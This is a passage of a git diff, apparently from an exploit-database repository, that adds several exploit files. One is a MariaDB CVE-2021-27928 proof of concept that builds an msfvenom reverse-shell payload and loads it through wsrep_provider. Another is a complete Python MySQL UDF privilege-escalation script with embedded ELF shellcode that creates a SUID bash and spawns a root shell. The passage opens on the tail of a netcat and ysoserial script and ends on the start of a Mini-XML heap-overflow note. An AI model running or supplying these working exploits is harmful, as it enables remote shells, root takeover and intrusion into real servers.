ysoserial-master-d367e379d9-1.jar && rm shell.sh +} + +declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do + case $arg in + i) ip=$OPTARG; let parameter_enable+=1;; + p) ncport=$OPTARG; let parameter_enable+=1;; + h) helpPanel;; + esac +done + +if [ $parameter_enable -ne 2 ]; then + helpPanel +else + webRequest +fi \ No newline at end of file diff --git a/exploits/linux/local/49765.txt b/exploits/linux/local/49765.txt new file mode 100644 index 000000000..f68d095da --- /dev/null +++ b/exploits/linux/local/49765.txt @@ -0,0 +1,20 @@ +# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution +# Date: 03/18/2021 +# Exploit Author: Central InfoSec +# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL +# Tested on: Linux +# CVE : CVE-2021-27928 + +# Proof of Concept: + +# Create the reverse shell payload +msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so + +# Start a listener +nc -lvp + +# Copy the payload to the target machine (In this example, SCP/SSH is used) +scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so + +# Execute the payload +mysql -u -p -h -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";' \ No newline at end of file diff --git a/exploits/linux/local/50236.py b/exploits/linux/local/50236.py new file mode 100755 index 000000000..f548bac5c --- /dev/null +++ b/exploits/linux/local/50236.py @@ -0,0 +1,116 @@ +# Exploit Title: MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) +# Date: 29/08/2021 +# Exploit Author: ninpwn +# Vendor Homepage: https://www.mysql.com +# Software Link: www.mysql.com +# Version: MySQL 4.x/5.x +# Tested on: Debian GNU/Linux 9 / mysql Ver 14.14 Distrib 5.7.30, for Linux (x86_64) using EditLine wrapper +# CVE : N/A + +''' +*** MySQL User-Defined (Linux) x32 / x86_64 sys_exec function Local Privilege Escalation Exploit - Python 3 Version *** + + +UDF lib shellcodes retrieved from metasploit +(there are windows .dll libraries within metasploit as well so this could be easily ported to Windows) + +Based on the Python 2 exploit by D7X (EDB ID: 46249) and the famous raptor_udf.c by Marco Ivaldi (EDB ID: 1518) +CVE: N/A +References: +https://dev.mysql.com/doc/refman/5.5/en/create-function-udf.html +https://www.exploit-db.com/exploits/1518 +https://www.exploit-db.com/exploits/46249 +https://www.exploit-db.com/papers/44139/ - MySQL UDF Exploitation by Osanda Malith Jayathissa (@OsandaMalith) + +Tested on Linux 4.9.0-12-amd64 #1 SMP Debian 4.9.210-1 (2020-01-20) x86_64 GNU/Linux + +@ninpwn +https://twitter.com/ninpwn +''' +#!/usr/bin/python3 + +import sys +import subprocess +import platform, random +import argparse +import os +import re +import pty + +shellcode_x32 = "7f454c4601010100000000000000000003000300010000007009000034000000581200000000000034002000040028001900180001000000000000000000000000000000f80e0000f80e00000500000000100000010000000010000000100000001000000801000010010000060000000010000002000000141000001410000014100000d0000000d0000000060000000400000051e5746400000000000000000000000000000000000000000600000004000000250000002a0000001400000008000000270000001d0000000000000000000000030000000000000011000000000000000a0000002900000012000000200000000000000000000000260000000c0000002100000017000000230000000d000000000000000e0000001c000000150000000000000006000000000000000000000010000000220000000f0000002400000019000000180000000000000000000000000000000000000000000000000000001a0000000200000013000000050000000000000000000000000000000000000000000000000000001f00000001000000280000000000000000000000000000000000000000000000070000002500000016000000000000000b00000000000000000000000000000000000000000000001e0000001b0000000000000000000000090000000000000000000000040000000000000011000000130000000400000007000000010804409019c7c9bda4080390046083130000001500000016000000180000001a0000001c0000001f00000021000000000000002200000000000000230000002400000026000000280000002900000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe1200000000000000000000000000000000e7000000000000008d00000012000000c2000000000000005c00000012000000ba00000000000000e7040000120000000100000000000000000000002000000025000000000000000000000020000000ed000000000000007e02000012000000ab01000000000000150100001200000079010000000000007d00000012000000c700000000000000c600000012000000f50000000000000071010000120000009e01000000000000fb00000012000000cf00000000000000700000001200000010010000000000002500000012000000e0000000000000008901000012000000b500000000000000a80200001200000016000000000000000b0100002200000088010000000000007400000012000000fb00000000000000230000001200000080010000040d00006100000012000b00750000003b0a00000500000012000b0010000000f80d00000000000012000c003f010000a10c00002500000012000b001f010000100900000000000012000900c301000008110000000000001000f1ff96000000470a00000500000012000b0070010000ee0c00001600000012000b00cf01000010110000000000001000f1ff56000000310a00000500000012000b00020100009c0b00003000000012000b00a30100007d0d00003e00000012000b00390000002c0a00000500000012000b00320100006b0c00003600000012000b00bc01000008110000000000001000f1ff65000000360a00000500000012000b0025010000fc0b00006f00000012000b0085000000400a00000700000012000b0017010000cc0b00003000000012000b0055010000c60c00002800000012000b00a90000004c0a00008800000012000b008f010000650d00001800000012000b00d7000000d40a0000c800000012000b00005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e312e3300474c4942435f322e3000474c4942435f322e310000000200030003000000000003000300030003000300030003000300030003000400030002000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000300b20100001000000000000000731f690900000400d4010000100000001069690d00000300e0010000100000001169690d00000200ea01000000000000040b000008000000b70b000008000000e70b000008000000110c000008000000220c000008000000550c0000080000008e0c000008000000ac0c000008000000d90c00000800000004110000080000006b0a0000020f00007c0a000002030000960a000002020000ad0a000002090000430b000002090000bc0a0000020c0000e40a0000020e0000f30a0000020e00003f0c0000020e00000e0b000002010000310b000002060000560b0000020a0000680b000002120000bf0b0000020d0000ef0b0000020d00005b0c0000020d0000960c0000020d0000b20c0000020d0000e10c0000020d0000fd0c000002080000580d000002110000770d0000020b00008e0d000002070000e410000006040000e810000006050000ec10000006100000fc1000000704000000110000071000005589e55383ec04e8000000005b81c3d40700008b93f4ffffff85d27405e81e000000e8b9000000e884040000585bc9c3ffb304000000ffa30800000000000000ffa30c0000006800000000e9e0ffffffffa3100000006808000000e9d0ffffff5589e55653e8ad00000081c37607000083ec1080bb1800000000755d8b83fcffffff85c0740e8b8314000000890424e8bcffffff8b8b1c0000008d831cffffff8d9318ffffff29d0c1f8028d70ff39f173208db6000000008d410189831c000000ff948318ffffff8b8b1c00000039f172e6c683180000000183c4105b5e5dc35589e553e82e00000081c3f706000083ec048b9320ffffff85d274158b93f8ffffff85d2740b8d8320ffffff890424ffd283c4045b5dc38b1c24c3905589e55dc35589e55dc35589e55dc35589e55dc35531c089e55dc35589e55dc35589e557565383ec0cfc83c9ff8b750c8b46088b3831c0f2aef7d18d59ffe8fcffffff83f8007c53753f83ec0c6a1ee8fcffffff5f596a006a00486a218d1418f7d06a0721d0506a00e8fcffffff83c42083f8ff89c7742351538b4608ff3057e8fcffffffffd7eb0b526a016a0050e8fcffffff31c083c410eb05b8010000008d65f45b5e5f5dc35589e557565383ec18fc6800040000e8fcffffffc70424010000008945e8e8fcffffffc6000089c68b450c595b31db68840e00008b4008ff30e8fcffffff8945eceb338b7de831c083c9fff2ae5252f7d18d79ff8d043b50568945f0e8fcffffff83c40c57ff75e889c68d041850e8fcffffff8b5df083c40cff75ec6a04ff75e8e8fcffffff83c41085c075b683ec0cff75ece8fcffffff83c410803e0075088b4518c60001eb16c6441eff0031c083c9ff89f7f2ae8b4514f7d14989088d65f489f05b5e5f5dc35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec088b450c833801750a8b400431d28338007414505068140e0000ff7510e8fcffffffb20183c41088d0c9c35589e55383ec048b550c8b5d10833a0274095050683f0e0000eb428b420483380074095050685e0e0000eb318b520c83ec0cc74004000000008b0283c00203420450e8fcffffff8b550883c41089420c31d285c07512505068860e000053e8fcffffffb20183c41088d08b5dfcc9c35589e583ec088b450c83380175128b4004833800750a8b4508c6000131c0eb14505068140e0000ff7510e8fcffffffb00183c410c9c35589e55383ec0c8b5d1068a00e000053e8fcffffff8b4514c7001e00000089d88b5dfcc9c35531d289e583ec088b450c8338007414525268bf0e0000ff7510e8fcffffffb20183c41088d0c9c35589e583ec148b450c8b4008ff30e8fcffffffc999c35589e557565383ec10fc8b550c8b45088b580c8b420c89df8b088d440b018945e88b42088b30f3a48b420c8b00c60403008b42088b4a0c8b7de88b70048b4904f3a48b420c8b55e88b4004c60402006a015253e8fcffffff8d65f45b5e5f5d99c35589e58b45088b400c85c074098945085de9fcffffff5dc35589e55783ec10fc8b450c8b4008ff30e8fcffffff83c41085c089c275088b4518c60001eb1131c083c9ff89d7f2ae8b4514f7d149890889d08b7dfcc9c390909090905589e55653e85dfcffff81c3260300008b8310ffffff83f8ff74198db310ffffff8db4260000000083ee04ffd08b0683f8ff75f45b5e5dc35589e55383ec04e8000000005b81c3ec020000e860fbffff595bc9c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff00000000ffffffff000000000000000001000000b20100000c000000100900000d000000f80d000004000000b4000000f5feff6ff8010000050000005805000006000000b80200000a000000f40100000b0000001000000003000000f010000002000000100000001400000011000000170000000009000011000000e0070000120000002001000013000000080000001600000000000000feffff6fa0070000ffffff6f01000000f0ffff6f4c070000faffff6f0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000141000000000000000000000560900006609000004110000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000b4000000b400000044010000030000000000000004000000040000000b000000f6ffff6f02000000f8010000f8010000c000000003000000000000000400000004000000150000000b00000002000000b8020000b8020000a0020000040000000100000004000000100000001d00000003000000020000005805000058050000f40100000000000000000000010000000000000025000000ffffff6f020000004c0700004c070000540000000300000000000000020000000200000032000000feffff6f02000000a0070000a00700004000000004000000010000000400000000000000410000000900000002000000e0070000e007000020010000030000000000000004000000080000004a0000000900000002000000000900000009000010000000030000000a0000000400000008000000530000000100000006000000100900001009000030000000000000000000000004000000000000004e000000010000000600000040090000400900003000000000000000000000000400000004000000590000000100000006000000700900007009000088040000000000000000000010000000000000005f0000000100000006000000f80d0000f80d00001c00000000000000000000000400000000000000650000000100000032000000140e0000140e0000dd000000000000000000000001000000010000006d0000000100000002000000f40e0000f40e00000400000000000000000000000400000000000000770000000100000003000000001000000010000008000000000000000000000004000000000000007e000000010000000300000008100000081000000800000000000000000000000400000000000000850000000100000003000000101000001010000004000000000000000000000004000000000000008a00000006000000030000001410000014100000d000000004000000000000000400000008000000930000000100000003000000e4100000e41000000c00000000000000000000000400000004000000980000000100000003000000f0100000f01000001400000000000000000000000400000004000000a1000000010000000300000004110000041100000400000000000000000000000400000000000000a7000000080000000300000008110000081100000800000000000000000000000400000000000000ac000000010000000000000000000000081100009b0000000000000000000000010000000000000001000000030000000000000000000000a3110000b500000000000000000000000100000000000000"; +shellcode_x64 = "7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000"; + +shellcode = shellcode_x32 +if (platform.architecture()[0] == '64bit'): + shellcode = shellcode_x64 + +# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root +# username='root' +# password='' + +### +#if len(sys.argv) != 2: +# print "Usage: %s " % argv[0] + +#username=sys.argv[1]; +#password=sys.argv[2]; +### + +parser = argparse.ArgumentParser() +parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True) +parser.add_argument('--password', '-p', help='MySQL password', type=str) + +args = parser.parse_args() + +username=args.username +password=args.password + +if not password: + password='' + +cmd='mysql -u root -p\'' + password + '\' -e "select @@plugin_dir \G"' +plugin_str = subprocess.check_output(cmd, shell=True) +plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str) +res = bool(plugin_dir) + +if not res: + print("Error: could not locate the plugin directory") + os.exit(1); + +plugin_dir_ = plugin_dir.group(1) + +print("Plugin dir is %s" % plugin_dir_) + +# file to save the udf so file to +udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so' +udf_outfile = plugin_dir_ + udf_filename + +# alternative way: +# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir; + +print("Trying to create a udf library..."); +os.system('mysql -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile) +res = os.path.isfile(udf_outfile) + +if not res: + print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile) + os.exit(1); + +print("UDF library created successfully: %s" % udf_outfile); +print("Trying to create sys_exec...") +os.system('mysql -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename) + +print("Checking if sys_exec was created...") +cmd='mysql -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"'; +res = subprocess.check_output(cmd, shell=True); + +if (res == ''): + print("sys_exec was not found (good luck next time!)") + +if res: + print("sys_exec was found: %s" % res) + print("Generating a SUID binary in /var/www/bash...") + os.system('mysql -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/bash /var/www/bash && chmod +s /var/www/bash\')"') + + print("Trying to spawn a root shell...") + os.system("cd /var/www && ./bash -p") \ No newline at end of file diff --git a/exploits/linux/local/50465.c b/exploits/linux/local/50465.c new file mode 100644 index 000000000..190e87e65 --- /dev/null +++ b/exploits/linux/local/50465.c @@ -0,0 +1,57 @@ +# Exploit Title: Mini-XML 3.2 - Heap Overflow +# Google Dork: mxml Mini-xml Mini-XML +# Date: 2020.10.19 +# Exploit Author: LIWEI +# Vendor Homepage: https://www.msweet.org/mxml/ +# Software Link: https://github.com/michaelrsweet/mxml +# Version: v3.2 +# Tested on: ubuntu 18.04.2 + +# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link". +# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string. +# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow. 